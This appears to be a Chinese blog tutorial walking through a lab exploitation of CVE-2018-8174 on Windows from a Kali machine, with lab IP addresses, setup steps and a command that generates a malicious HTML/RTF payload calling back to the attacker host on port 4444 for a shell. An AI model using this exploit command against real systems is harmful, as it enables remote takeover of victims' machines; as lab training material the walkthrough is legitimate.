天天看点
返回

利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell

一、 利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell

实验环境:

kali攻击机(192.168.98.30)

window目标机(192.168.98.35)

CVE-2018-8174脚本

实验步骤:

1、xshell上传 CVE-2018-8174 的 EXP 到 Kali

2、解压 CVE-2018-8174 并进入该目录

利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell

3、利用EXP生成恶意html文件,并放到/var/www/html,为了让目标机访问

python2 CVE-2018-8174.py -u http://192.168.98.30/exploit.html -o hack.rtf -i 192.168.98.30 -p 4444

cp exploit.html /var/www/htm

渗透测试 网络安全全栈课程 oday 渗透
上一篇: 【Flask基础】五,Cookies/Session的设置与获取一,Cookies的设置、获取、删除二,Session的设置、获取、删除
下一篇: spring data系列之redis

继续阅读